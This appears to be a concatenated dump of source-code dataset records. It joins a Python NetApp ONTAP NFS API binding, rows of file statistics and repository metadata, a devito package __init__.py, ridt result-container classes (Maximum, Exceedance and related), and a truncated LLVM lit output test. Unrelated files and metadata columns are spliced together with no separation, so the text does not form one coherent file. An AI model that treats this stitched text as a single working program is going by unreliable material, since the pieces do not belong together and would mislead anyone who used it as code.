available will be returned.
"""
return self.request( "nfs-service-get-iter", {
'max_records': max_records,
'query': [ query, 'query', [ NfsInfo, 'None' ], False ],
'tag': tag,
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NfsInfo, 'None' ], False ],
}, {
'attributes-list': [ NfsInfo, True ],
} )
def nfs_monitor_remove_locks(self, owners):
"""
removes the NFS locks of a specfied process of a specified
client host.
:param owners: List of owners whose locks have to be deleted.
"""
return self.request( "nfs-monitor-remove-locks", {
'owners': [ owners, 'owners', [ OwnerInfo, 'None' ], True ],
}, {
} )
def nfs_enable(self):
"""
In Data ONTAP 7-Mode, this API will enable NFS server
access (effectively same as the CLI command "nfs on")
In Data ONTAP Cluster-Mode, this will start the Vserver's
NFS service. If the NFS service was not explicitly created,
this API will create one with default options.
"""
return self.request( "nfs-enable", {
}, {
} )
def nfs_stats_top_clients_list_iter_end(self, tag):
"""
Terminate NFS client statistics iteration and cleanup any
saved info.
:param tag: Tag from a previous nfs-stats-top-clients-list-iter-start
"""
return self.request( "nfs-stats-top-clients-list-iter-end", {
'tag': tag,
}, {
} )
def nfs_exportfs_list_rules_2(self, pathname=None, persistent=None):
"""
Returns the rules associated with exports, using the new
security info structure. If a pathname is specified,
the rules associated with the export matching that
pathname, are returned; otherwise, rules for all exports
are returned.
:param pathname: The pathname, for whose matching export, the client wants
a listing of the associated rules. If this parameter is
provided, the persistent parameter is ignored.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true,
the export entries that are present in the /etc/exports file
are returned; otherwise, those loaded in memory are returned.
This parameter is ignored, if the pathname parameter is
provided.
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an empty list
will be returned.
"""
return self.request( "nfs-exportfs-list-rules-2", {
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
}, {
'rules': [ ExportsRuleInfo2, True ],
} )
def nfs_service_modify(self, is_nfsv3_connection_drop_enabled=None, is_nfsv3_enabled=None, default_windows_user=None, is_nfsv41_acl_preserve_enabled=None, is_nfsv40_referrals_enabled=None, is_nfsv41_pnfs_enabled=None, is_nfsv40_migration_enabled=None, chown_mode=None, is_nfsv41_referrals_enabled=None, nfsv41_implementation_id_domain=None, nfsv41_implementation_id_name=None, is_nfsv4_numeric_ids_enabled=None, is_nfsv40_acl_enabled=None, is_nfs_access_enabled=None, rpcsec_ctx_idle=None, is_nfsv2_enabled=None, nfsv4_acl_max_aces=None, is_nfsv4_fsid_change_enabled=None, is_nfsv40_req_open_confirm_enabled=None, nfsv4_id_domain=None, is_nfsv40_read_delegation_enabled=None, is_nfs_rootonly_enabled=None, is_nfsv41_pnfs_striped_volumes_enabled=None, nfsv41_implementation_id_time=None, is_nfsv41_acl_enabled=None, is_nfsv40_write_delegation_enabled=None, ntfs_unix_security_ops=None, is_mount_rootonly_enabled=None, nfsv4x_session_num_slots=None, enable_ejukebox=None, nfsv4x_session_slot_reply_cache_size=None, rpcsec_ctx_high=None, is_nfsv41_read_delegation_enabled=None, is_vstorage_enabled=None, is_nfsv3_fsid_change_enabled=None, nfsv4_grace_seconds=None, nfsv4_lease_seconds=None, is_nfsv41_write_delegation_enabled=None, is_nfsv41_migration_enabled=None, is_validate_qtree_export_enabled=None, is_nfsv41_enabled=None, is_nfsv40_enabled=None, default_windows_group=None, is_nfsv41_state_protection_enabled=None):
"""
Modify an NFS configuration. If no values are given, the NFS
configuration is not modified.
:param is_nfsv3_connection_drop_enabled: If 'true', then connection is dropped when an NFSv3 request is
dropped. Default value is 'true'.
:param is_nfsv3_enabled: If 'true', then NFS version 3 is enabled. Default value is
'true'.
:param default_windows_user: The default windows user for CIFS access.
:param is_nfsv41_acl_preserve_enabled: If 'true', the NFSv4 server will preserve and modify ACL when
chmod <mode> is done. Default value is 'true'.
:param is_nfsv40_referrals_enabled: If 'true', then NFSv4.0 Referrals feature is enabled. Default
value is 'false'.
:param is_nfsv41_pnfs_enabled: If 'true', then Parallel NFS support for NFS version 4.1 is
enabled. Default value is 'true'.
:param is_nfsv40_migration_enabled: If 'true', then NFSv4.0 Migration feature is enabled. Default
value is 'false'.
:param chown_mode: Vserver Change Ownership Mode. Possible values are 'ignore',
'fail', 'use_export_policy'. If 'use_export_policy' is set,
export policy option is used. Default value is
'use_export_policy'.
Possible values:
<ul>
<li> "restricted" ,
<li> "unrestricted" ,
<li> "use_export_policy"
</ul>
:param is_nfsv41_referrals_enabled: If 'true', then NFSv4.1 Referrals feature is enabled. Default
value is 'false'.
:param nfsv41_implementation_id_domain: NFSv4.1 Implementation id domain. Default value is
'defaultv41impliddomain.com'.
:param nfsv41_implementation_id_name: NFSv4.1 Implementation id name. Default value is
'defaultv41implidname'.
:param is_nfsv4_numeric_ids_enabled: If 'true', then NFSv4 support for Numeric Owner IDs is enabled.
Default value is 'true'.
:param is_nfsv40_acl_enabled: If 'true', then NFSv4.0 ACL feature is enabled. Default value is
'false'.
:param is_nfs_access_enabled: If 'true',then NFS server access is enabled. Default value is
'true'.
:param rpcsec_ctx_idle: Time in seconds before an idle entry in RPCSEC_GSS context cache
is deleted. Default value is 0.
:param is_nfsv2_enabled: Starting Data ONTAP 8.2, NFS v2 is no longer supported. Default
value is 'false'.
:param nfsv4_acl_max_aces: Maximum Number of ACEs allowed in an ACL. Range is 192 to 1024.
Default value is 400.
:param is_nfsv4_fsid_change_enabled: If 'true', then clients see change in FSID as NFSv4 clients
traverse filesystems. Default value is 'true'.
:param is_nfsv40_req_open_confirm_enabled: If 'true', then the server will require an OPEN_CONFIRM operation
for all NFSv4.0 clients. Default value is 'false'.
:param nfsv4_id_domain: NFSv4 ID mapping domain. Default value is
'defaultv4iddomain.com'.
:param is_nfsv40_read_delegation_enabled: If 'true', NFSv4.0 read delegation feature is enabled. Default
value is 'false'.
:param is_nfs_rootonly_enabled: If 'true', then the vserver allows NFS protocol calls only from
privileged ports (port numbers less than 1024). Default value is
'false'.
:param is_nfsv41_pnfs_striped_volumes_enabled: If 'true', Striped volume support for Parallel NFS is enabled .
Default value is 'false'.
:param nfsv41_implementation_id_time: NFSv4.1 Implementation id time.The number of seconds since
January 1, 1970.
:param is_nfsv41_acl_enabled: If 'true', then NFSv4.1 ACL feature is enabled. Default value is
'false'.
:param is_nfsv40_write_delegation_enabled: If 'true', NFSv4.0 write delegation feature is enabled. Default
value is 'false'.
:param ntfs_unix_security_ops: Ignore/Fail unix security operations on NTFS volumes. Possible
values are 'ignore', 'fail','use_export_policy'. If
'use_export_policy' is set, export policy option is used.
Default value is 'use_export_policy'.
:param is_mount_rootonly_enabled: If 'true', then the vserver allows MOUNT protocol calls only from
privileged ports (port numbers less than 1024). Default value is
'true'.
:param nfsv4x_session_num_slots: Number of Slots in the NFSv4.x Session Slot Tables. Default value
is 180.
:param enable_ejukebox: If 'true', then the NFS server will send EJUKEBOX error on server
delays.
:param nfsv4x_session_slot_reply_cache_size: Size of the Reply that will be Cached in Each NFSv4.x Session
Slot (in bytes). Default value is 640.
:param rpcsec_ctx_high: High water mark for the RPCSEC_GSS Context Cache. Default value
is 0.
:param is_nfsv41_read_delegation_enabled: If 'true', NFSv4.1 read delegation feature is enabled. Default
value is 'false'.
:param is_vstorage_enabled: If 'true', then enables the usage of vStorage protocol for server
side copies, which is mostly used in hypervisors. Default value
is 'false'.
:param is_nfsv3_fsid_change_enabled: If 'true', then NFSv3 clients see change in FSID as they traverse
filesystems. Default value is 'true'.
:param nfsv4_grace_seconds: NFSv4 Grace timeout value in seconds. Default value is 45
seconds.
:param nfsv4_lease_seconds: NFSv4 Lease timeout value in seconds. Default value is 30
seconds.
:param is_nfsv41_write_delegation_enabled: If 'true', NFSv4.1 write delegation feature is enabled. Default
value is 'false'.
:param is_nfsv41_migration_enabled: If 'true', then NFSv4.1 Migration feature is enabled. Default
value is 'false'.
:param is_validate_qtree_export_enabled: If 'true', then the Vserver performs additional validation for
qtree. Default value is 'true'.
:param is_nfsv41_enabled: If 'true', then NFS version 4.1 is enabled. Default value is
'false'.
:param is_nfsv40_enabled: If 'true', then NFS version 4.0 is enabled. Default value is
'false'.
:param default_windows_group: The default windows group for CIFS access.
:param is_nfsv41_state_protection_enabled: If 'true', then NFSv4.1 State Protection is enabled. Default
value is 'true'.
"""
return self.request( "nfs-service-modify", {
'is_nfsv3_connection_drop_enabled': [ is_nfsv3_connection_drop_enabled, 'is-nfsv3-connection-drop-enabled', [ bool, 'None' ], False ],
'is_nfsv3_enabled': [ is_nfsv3_enabled, 'is-nfsv3-enabled', [ bool, 'None' ], False ],
'default_windows_user': [ default_windows_user, 'default-windows-user', [ basestring, 'None' ], False ],
'is_nfsv41_acl_preserve_enabled': [ is_nfsv41_acl_preserve_enabled, 'is-nfsv41-acl-preserve-enabled', [ bool, 'None' ], False ],
'is_nfsv40_referrals_enabled': [ is_nfsv40_referrals_enabled, 'is-nfsv40-referrals-enabled', [ bool, 'None' ], False ],
'is_nfsv41_pnfs_enabled': [ is_nfsv41_pnfs_enabled, 'is-nfsv41-pnfs-enabled', [ bool, 'None' ], False ],
'is_nfsv40_migration_enabled': [ is_nfsv40_migration_enabled, 'is-nfsv40-migration-enabled', [ bool, 'None' ], False ],
'chown_mode': [ chown_mode, 'chown-mode', [ basestring, 'nfschownmode' ], False ],
'is_nfsv41_referrals_enabled': [ is_nfsv41_referrals_enabled, 'is-nfsv41-referrals-enabled', [ bool, 'None' ], False ],
'nfsv41_implementation_id_domain': [ nfsv41_implementation_id_domain, 'nfsv41-implementation-id-domain', [ basestring, 'None' ], False ],
'nfsv41_implementation_id_name': [ nfsv41_implementation_id_name, 'nfsv41-implementation-id-name', [ basestring, 'None' ], False ],
'is_nfsv4_numeric_ids_enabled': [ is_nfsv4_numeric_ids_enabled, 'is-nfsv4-numeric-ids-enabled', [ bool, 'None' ], False ],
'is_nfsv40_acl_enabled': [ is_nfsv40_acl_enabled, 'is-nfsv40-acl-enabled', [ bool, 'None' ], False ],
'is_nfs_access_enabled': [ is_nfs_access_enabled, 'is-nfs-access-enabled', [ bool, 'None' ], False ],
'rpcsec_ctx_idle': [ rpcsec_ctx_idle, 'rpcsec-ctx-idle', [ int, 'None' ], False ],
'is_nfsv2_enabled': [ is_nfsv2_enabled, 'is-nfsv2-enabled', [ bool, 'None' ], False ],
'nfsv4_acl_max_aces': [ nfsv4_acl_max_aces, 'nfsv4-acl-max-aces', [ int, 'None' ], False ],
'is_nfsv4_fsid_change_enabled': [ is_nfsv4_fsid_change_enabled, 'is-nfsv4-fsid-change-enabled', [ bool, 'None' ], False ],
'is_nfsv40_req_open_confirm_enabled': [ is_nfsv40_req_open_confirm_enabled, 'is-nfsv40-req-open-confirm-enabled', [ bool, 'None' ], False ],
'nfsv4_id_domain': [ nfsv4_id_domain, 'nfsv4-id-domain', [ basestring, 'None' ], False ],
'is_nfsv40_read_delegation_enabled': [ is_nfsv40_read_delegation_enabled, 'is-nfsv40-read-delegation-enabled', [ bool, 'None' ], False ],
'is_nfs_rootonly_enabled': [ is_nfs_rootonly_enabled, 'is-nfs-rootonly-enabled', [ bool, 'None' ], False ],
'is_nfsv41_pnfs_striped_volumes_enabled': [ is_nfsv41_pnfs_striped_volumes_enabled, 'is-nfsv41-pnfs-striped-volumes-enabled', [ bool, 'None' ], False ],
'nfsv41_implementation_id_time': [ nfsv41_implementation_id_time, 'nfsv41-implementation-id-time', [ int, 'date' ], False ],
'is_nfsv41_acl_enabled': [ is_nfsv41_acl_enabled, 'is-nfsv41-acl-enabled', [ bool, 'None' ], False ],
'is_nfsv40_write_delegation_enabled': [ is_nfsv40_write_delegation_enabled, 'is-nfsv40-write-delegation-enabled', [ bool, 'None' ], False ],
'ntfs_unix_security_ops': [ ntfs_unix_security_ops, 'ntfs-unix-security-ops', [ basestring, 'None' ], False ],
'is_mount_rootonly_enabled': [ is_mount_rootonly_enabled, 'is-mount-rootonly-enabled', [ bool, 'None' ], False ],
'nfsv4x_session_num_slots': [ nfsv4x_session_num_slots, 'nfsv4x-session-num-slots', [ int, 'None' ], False ],
'enable_ejukebox': [ enable_ejukebox, 'enable-ejukebox', [ bool, 'None' ], False ],
'nfsv4x_session_slot_reply_cache_size': [ nfsv4x_session_slot_reply_cache_size, 'nfsv4x-session-slot-reply-cache-size', [ int, 'None' ], False ],
'rpcsec_ctx_high': [ rpcsec_ctx_high, 'rpcsec-ctx-high', [ int, 'None' ], False ],
'is_nfsv41_read_delegation_enabled': [ is_nfsv41_read_delegation_enabled, 'is-nfsv41-read-delegation-enabled', [ bool, 'None' ], False ],
'is_vstorage_enabled': [ is_vstorage_enabled, 'is-vstorage-enabled', [ bool, 'None' ], False ],
'is_nfsv3_fsid_change_enabled': [ is_nfsv3_fsid_change_enabled, 'is-nfsv3-fsid-change-enabled', [ bool, 'None' ], False ],
'nfsv4_grace_seconds': [ nfsv4_grace_seconds, 'nfsv4-grace-seconds', [ int, 'None' ], False ],
'nfsv4_lease_seconds': [ nfsv4_lease_seconds, 'nfsv4-lease-seconds', [ int, 'None' ], False ],
'is_nfsv41_write_delegation_enabled': [ is_nfsv41_write_delegation_enabled, 'is-nfsv41-write-delegation-enabled', [ bool, 'None' ], False ],
'is_nfsv41_migration_enabled': [ is_nfsv41_migration_enabled, 'is-nfsv41-migration-enabled', [ bool, 'None' ], False ],
'is_validate_qtree_export_enabled': [ is_validate_qtree_export_enabled, 'is-validate-qtree-export-enabled', [ bool, 'None' ], False ],
'is_nfsv41_enabled': [ is_nfsv41_enabled, 'is-nfsv41-enabled', [ bool, 'None' ], False ],
'is_nfsv40_enabled': [ is_nfsv40_enabled, 'is-nfsv40-enabled', [ bool, 'None' ], False ],
'default_windows_group': [ default_windows_group, 'default-windows-group', [ basestring, 'None' ], False ],
'is_nfsv41_state_protection_enabled': [ is_nfsv41_state_protection_enabled, 'is-nfsv41-state-protection-enabled', [ bool, 'None' ], False ],
}, {
} )
| 56.451645
| 1,443
| 0.633281
| 6,866
| 56,621
| 5.034227
| 0.075881
| 0.030725
| 0.042124
| 0.032403
| 0.828844
| 0.804542
| 0.786287
| 0.776653
| 0.772573
| 0.757095
| 0
| 0.01889
| 0.278201
| 56,621
| 1,002
| 1,444
| 56.507984
| 0.826861
| 0.465163
| 0
| 0.613924
| 0
| 0
| 0.270324
| 0.158367
| 0
| 0
| 0
| 0
| 0
| 1
| 0.10443
| false
| 0
| 0.063291
| 0
| 0.275316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a4c491572df293e8ca4574594c16161ca4c82b2
| 265
|
py
|
Python
|
devito/finite_differences/__init__.py
|
reguly/devito
|
543b7be41ddbf1faa90224cca3824767756c9390
|
[
"MIT"
] | 204
|
2020-01-09T11:27:58.000Z
|
2022-03-20T22:53:37.000Z
|
devito/finite_differences/__init__.py
|
reguly/devito
|
543b7be41ddbf1faa90224cca3824767756c9390
|
[
"MIT"
] | 949
|
2016-04-25T11:41:34.000Z
|
2019-12-27T10:43:40.000Z
|
devito/finite_differences/__init__.py
|
reguly/devito
|
543b7be41ddbf1faa90224cca3824767756c9390
|
[
"MIT"
] | 131
|
2020-01-08T17:43:13.000Z
|
2022-03-27T11:36:47.000Z
|
from .differentiable import * # noqa
from .elementary import * # noqa
from .finite_difference import * # noqa
from .derivative import * # noqa
from .tools import generate_fd_shortcuts # noqa
from .coefficients import * # noqa
from .operators import * # noqa
| 33.125
| 48
| 0.739623
| 32
| 265
| 6.03125
| 0.4375
| 0.310881
| 0.362694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184906
| 265
| 7
| 49
| 37.857143
| 0.893519
| 0.128302
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43550d00c86d9c4cb941c9a841dccbf3535e8e25
| 16,110
|
py
|
Python
|
ridt/analysis/resultcontainers.py
|
riskaware-ltd/ridt
|
c0288a2f814b2749bdf73de7157f7477ca271aff
|
[
"MIT"
] | null | null | null |
ridt/analysis/resultcontainers.py
|
riskaware-ltd/ridt
|
c0288a2f814b2749bdf73de7157f7477ca271aff
|
[
"MIT"
] | 9
|
2020-09-18T08:22:39.000Z
|
2021-07-20T09:39:59.000Z
|
ridt/analysis/resultcontainers.py
|
riskaware-ltd/ridt
|
c0288a2f814b2749bdf73de7157f7477ca271aff
|
[
"MIT"
] | 1
|
2021-06-22T21:53:20.000Z
|
2021-06-22T21:53:20.000Z
|
from typing import Tuple
from ridt.container import Domain
from ridt.config import RIDTConfig
from ridt.config import Units
class ResultContainer:
"""A base class for all results containers.
Attributes
----------
setting : :class:`~.RIDTConfig`
The settings for the run in question.
geometry : :obj:`str`
The geometry domain this result corresponds to.
id : :obj:`str`
The id of the domain this result corresponds to.
domain : :class:`~.Domain`
The instance of :class:`~.Domain` corresponding to :attr:`setting`.
quantity: :obj:`str`
The string id for the quantity stored in the data store.
units : :class:`~.Units`
The instance of :class:`~.Units` corresponding to :attr:`setting`.
"""
def __init__(self, setting: RIDTConfig, geometry: str, id: str, quantity: str):
self.setting = setting
self.geometry = geometry
self.id = id
self.quantity = quantity
self.units = Units(setting)
self.domain = Domain(setting)
def same_geometry(self, other):
"""Checks if item has same :attr:`geometry`.
Parameters
----------
other
The comparative item.
Raises
------
:obj:`ValueError`
if the :attr:`geometry` attributes are different.
"""
if self.geometry != other.geometry:
raise ValueError("You are comparing two different geometries.")
@property
def unit(self):
""":obj:`str` The units corresponding :attr:`quantity`.
"""
return getattr(self.units, f"{self.quantity}")
class Maximum(ResultContainer):
"""Result container for the max value in a domain.
Attributes
----------
index : Tuple[:obj:`int`]
The index in the array where the maximum occurred.
value : :obj:`float`
The value of the maximum.
"""
def __init__(self,
setting: RIDTConfig,
geometry: str,
id: str,
quantity: str,
index: Tuple[int],
value: float):
"""The Maximum class initialiser
Parameters
----------
setting : :class:`~.RIDTConfig`
The settings for the run in question.
geometry : :obj:`str`
The geometry domain this result corresponds to.
id : :obj:`str`
The id of the domain this result corresponds to.
quantity: :obj:`str`
The string id for the quantity stored in the data store.
index : Tuple[:obj:`int`]
The index in the array where the maximum occurred.
value : :obj:`float`
The value of the maximum.
"""
super().__init__(setting, geometry, id, quantity)
self.index = index
self.value = value
def __lt__(self, other):
if not isinstance(other, Maximum):
raise TypeError(
f"< not supported between instances of {Maximum} and {type(other)}")
self.same_geometry(other)
return True if self.value < other.value else False
@property
def string(self):
""":obj:`str` : The string representation of the result.
"""
u = getattr(self.units, f"{self.quantity}")
factor = getattr(self.units, f"{self.quantity}_factor")
rv = str()
if self.index:
t, x, y, z = self.domain.values(self.id, self.index)
rv += f"id: {self.id}\n"
rv += f"time: {t:.2f}{self.units.time}\n"
rv += f"x: {x:.2f}{self.units.space}\n"
rv += f"y: {y:.2f}{self.units.space}\n"
rv += f"z: {z:.2f}{self.units.space}\n"
rv += f"value: {self.value / factor:.2e}{u}\n\n"
else:
rv += "None\n\n"
return rv
@property
def header(self):
""":obj:`list` [:obj:`str`] : The list of headers for a csv output.
"""
return [
"id",
f"time ({self.units.time})",
f"x ({self.units.space})",
f"y ({self.units.space})",
f"z ({self.units.space})",
f"value ({self.unit})"
]
@property
def row(self):
""":obj:`list` [:obj:`float`] : The list of values for a csv output.
"""
factor = getattr(self.units, f"{self.quantity}_factor")
if self.index:
t, x, y, z = self.domain.values(self.id, self.index)
return [self.id, t, x, y, z, self.value / factor]
else:
return [self.id, "None", "None", "None", "None"]
@property
def fname(self):
""":obj:`str` : the file name for the this result output.
"""
return f"{self.geometry}_maximums.csv"
@property
def title(self):
""":obj:`str` : the title string for this result.
"""
return "Maxima"
@property
def extreme_title(self):
""":obj:`str` : the extremum version of the title for this result.
"""
return f"Maximum value for {self.geometry}:"
@property
def valid(self):
""":obj:`bool` : Returns true if contains valid index, else false.
"""
if self.index and self.value != "nan":
return True
else:
return False
class Exceedance(ResultContainer):
"""Result container for the threshold exceedance in a domain.
Attributes
----------
index : Tuple[:obj:`int`]
The index in the array where the exceedance occurred.
threshold : :obj:`float`
The threshold that was exceeded.
"""
def __init__(self,
setting: RIDTConfig,
geometry: str,
id: str,
quantity: str,
index: Tuple[int],
threshold: float):
"""The Exceedance class initialiser
Parameters
----------
setting : :class:`~.RIDTConfig`
The settings for the run in question.
geometry : :obj:`str`
The geometry domain this result corresponds to.
id : :obj:`str`
The id of the domain this result corresponds to.
quantity: :obj:`str`
The string id for the quantity stored in the data store.
index : Tuple[:obj:`int`]
The index in the array where the exceedance occurred.
threshold : :obj:`float`
The threshold that was exceeded.
"""
super().__init__(setting, geometry, id, quantity)
self.threshold = threshold
self.index = index
def __lt__(self, other):
if not isinstance(other, Exceedance):
raise TypeError(
f"< not supported between instances of {Exceedance} and {type(other)}")
self.same_geometry(other)
return True if self.index[0] < other.index[0] else False
@property
def string(self):
""":obj:`str` : The string representation of the result.
"""
rv = str()
if self.index:
t, x, y, z = self.domain.values(self.id, self.index)
rv += f"id: {self.id}\n"
rv += f"time: {t:.2f}{self.units.time}\n"
rv += f"x: {x:.2f}{self.units.space}\n"
rv += f"y: {y:.2f}{self.units.space}\n"
rv += f"z: {z:.2f}{self.units.space}\n"
else:
rv += "None\n\n"
return rv
@property
def header(self):
""":obj:`list` [:obj:`str`] : The list of headers for a csv output.
"""
return [
"id",
f"time ({self.units.time})",
f"x ({self.units.space})",
f"y ({self.units.space})",
f"z ({self.units.space})",
]
@property
def row(self):
""":obj:`list` [:obj:`float`] : The list of values for a csv output.
"""
if self.index:
t, x, y, z = self.domain.values(self.id, self.index)
return [self.id, t, x, y, z]
else:
return [self.id, "None", "None", "None"]
@property
def fname(self):
""":obj:`str` : the file name for the this result output.
"""
return f"{self.geometry}_exceeds_{self.threshold}{self.unit}.csv"
@property
def title(self):
""":obj:`str` : the title string for this result.
"""
return "Threshold Exceedance"
@property
def extreme_title(self):
""":obj:`str` : the extremum version of the title for this result.
"""
return f"Minimum time to {self.threshold}{self.unit} for {self.geometry}:"
@property
def valid(self):
""":obj:`bool` : Returns true if contains valid index, else false.
"""
return True if self.index else False
class PercentExceedance(ResultContainer):
"""Result container for the percent threshold exceedance in a domain.
Attributes
----------
index : :obj:`int`
The time index in the array where the exceedance occurred.
threshold : :obj:`float`
The threshold that was exceeded.
percent : :obj:`float`
The percentage by which the threshold was exceeded
"""
def __init__(self,
setting: RIDTConfig,
geometry: str,
id: str,
quantity: str,
index: int,
threshold: float,
percent: float):
"""The PercentExceedance class initialiser
Parameters
----------
setting : :class:`~.RIDTConfig`
The settings for the run in question.
geometry : :obj:`str`
The geometry domain this result corresponds to.
id : :obj:`str`
The id of the domain this result corresponds to.
quantity: :obj:`str`
The string id for the quantity stored in the data store.
index : :obj:`int`
The time index in the array where the exceedance occurred.
threshold : :obj:`float`
The threshold that was exceeded.
percent : :obj:`float`
The percentage by which the threshold was exceeded
"""
super().__init__(setting, geometry, id, quantity)
self.threshold = threshold
self.index = index
self.percent = percent
def __lt__(self, other):
if not isinstance(other, PercentExceedance):
raise TypeError(
f"< not supported between instances of {PercentExceedance} and"\
f" {type(other)}")
self.same_geometry
return True if self.index < other.index else False
@property
def string(self):
""":obj:`str` : The string representation of the result.
"""
rv = str()
if self.index:
t = self.domain.time[self.index]
rv += f"id: {self.id}\n"
rv += f"time: {t:.2f}{self.units.time}\n\n"
else:
rv += "None\n\n"
return rv
@property
def header(self):
""":obj:`list` [:obj:`str`] : The list of headers for a csv output.
"""
return [
"id",
f"time ({self.units.time})",
]
@property
def row(self):
""":obj:`list` [:obj:`float`] : The list of values for a csv output.
"""
if self.index:
t = self.domain.time[self.index]
return [self.id, t]
else:
return [self.id, "None"]
@property
def fname(self):
""":obj:`str` : the file name for the this result output.
"""
return f"{self.percent}%_of_{self.geometry}_exceeds_{self.threshold}{self.unit}.csv"
@property
def title(self):
""":obj:`str` : the title string for this result.
"""
return f"{self.percent}% Threshold Exceedance"
@property
def extreme_title(self):
""":obj:`str` : the extremum version of the title for this result.
"""
return f"Minimum time to {self.threshold}{self.unit} for "\
f"{self.percent}% of domain for {self.geometry}:"
@property
def valid(self):
""":obj:`bool` : Returns true if contains valid index, else false.
"""
return True if self.index else False
class MaxPercentExceedance(ResultContainer):
"""Result container for the max percent threshold exceedance in a domain.
Attributes
----------
index : :obj:`int`
The time index in the array where the exceedance occurred.
threshold : :obj:`float`
The threshold that was exceeded.
value : :obj:`float`
The percentage by which the threshold was exceeded
"""
def __init__(self,
setting: RIDTConfig,
geometry: str,
id: str,
quantity:str,
value: float,
index: int,
threshold: float):
"""The PercentExceedance class initialiser
Parameters
----------
setting : :class:`~.RIDTConfig`
The settings for the run in question.
geometry : :obj:`str`
The geometry domain this result corresponds to.
id : :obj:`str`
The id of the domain this result corresponds to.
quantity: :obj:`str`
The string id for the quantity stored in the data store.
index : :obj:`int`
The time index in the array where the exceedance occurred.
threshold : :obj:`float`
The threshold that was exceeded.
value: :obj:`float`
The percentage by which the threshold was exceeded
"""
super().__init__(setting, geometry, id, quantity)
self.threshold = threshold
self.index = index
self.value = value
def __lt__(self, other):
if not isinstance(other, MaxPercentExceedance):
raise TypeError(
f"< not supported between instances of {MaxPercentExceedance} and {type(other)}")
self.same_geometry(other)
return True if self.value < other.value else False
@property
def string(self):
""":obj:`str` : The string representation of the result.
"""
rv = str()
if self.index:
t = self.domain.time[self.index]
rv += f"id: {self.id}\n"
rv += f"time: {t:.2f}{self.units.time}\n"
rv += f"value: {self.value:.2f}%\n\n"
else:
rv += "None\n\n"
return rv
@property
def header(self):
""":obj:`list` [:obj:`str`] : The list of headers for a csv output.
"""
return [
"id",
f"time ({self.units.time})",
f"value (%)"
]
@property
def row(self):
""":obj:`list` [:obj:`float`] : The list of values for a csv output.
"""
if self.index:
t = self.domain.time[self.index]
return [self.id, t, self.value]
else:
return [self.id, "None", "None"]
@property
def fname(self):
""":obj:`str` : the file name for the this result output.
"""
return f"{self.geometry}_max%_exceeds_{self.threshold}{self.unit}.csv"
@property
def title(self):
""":obj:`str` : the title string for this result.
"""
return "Maximum % Threshold Exceedance"
@property
def extreme_title(self):
""":obj:`str` : the extremum version of the title for this result.
"""
return f"Maximum percentage exceeding {self.threshold}{self.unit} "\
f"for {self.geometry}:"
@property
def valid(self):
""":obj:`bool` : Returns true if contains valid index, else false.
"""
return True if self.index else False
| 27.871972
| 92
| 0.53023
| 1,856
| 16,110
| 4.563039
| 0.075431
| 0.025505
| 0.038257
| 0.026095
| 0.855355
| 0.838352
| 0.820522
| 0.806235
| 0.767269
| 0.767269
| 0
| 0.001333
| 0.347921
| 16,110
| 577
| 93
| 27.920277
| 0.804855
| 0.371633
| 0
| 0.713725
| 0
| 0.003922
| 0.194324
| 0.072387
| 0
| 0
| 0
| 0
| 0
| 1
| 0.152941
| false
| 0
| 0.015686
| 0
| 0.337255
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4357fe88f905f13a8c5fedb3f6348b6bb51be65b
| 1,625
|
py
|
Python
|
llvm/utils/lit/tests/test-output-micro.py
|
medismailben/llvm-project
|
e334a839032fe500c3bba22bf976ab7af13ce1c1
|
[
"Apache-2.0"
] | 4,812
|
2015-01-02T19:38:10.000Z
|
2022-03-27T12:42:24.000Z
|
llvm/utils/lit/tests/test-output-micro.py
|
medismailben/llvm-project
|
e334a839032fe500c3bba22bf976ab7af13ce1c1
|
[
"Apache-2.0"
] | 11,789
|
2015-01-05T04:50:15.000Z
|
2022-03-31T23:39:19.000Z
|
llvm/utils/lit/tests/test-output-micro.py
|
medismailben/llvm-project
|
e334a839032fe500c3bba22bf976ab7af13ce1c1
|
[
"Apache-2.0"
] | 2,543
|
2015-01-01T11:18:36.000Z
|
2022-03-22T21:32:36.000Z
|
# RUN: %{lit} -j 1 -v %{inputs}/test-data-micro --output %t.results.out
# RUN: FileCheck < %t.results.out %s
# RUN: rm %t.results.out
# CHECK: {
# CHECK: "__version__"
# CHECK: "elapsed"
# CHECK-NEXT: "tests": [
# CHECK-NEXT: {
# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": null,
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "micro_value0": 4,
# CHECK-NEXT: "micro_value1": 1.3
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini:test{{[0-2]}}",
# CHECK-NEXT: "output": ""
# CHECK-NEXT: },
# CHECK-NEXT: {
# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": null,
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "micro_value0": 4,
# CHECK-NEXT: "micro_value1": 1.3
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini:test{{[0-2]}}",
# CHECK-NEXT: "output": ""
# CHECK-NEXT: },
# CHECK-NEXT: {
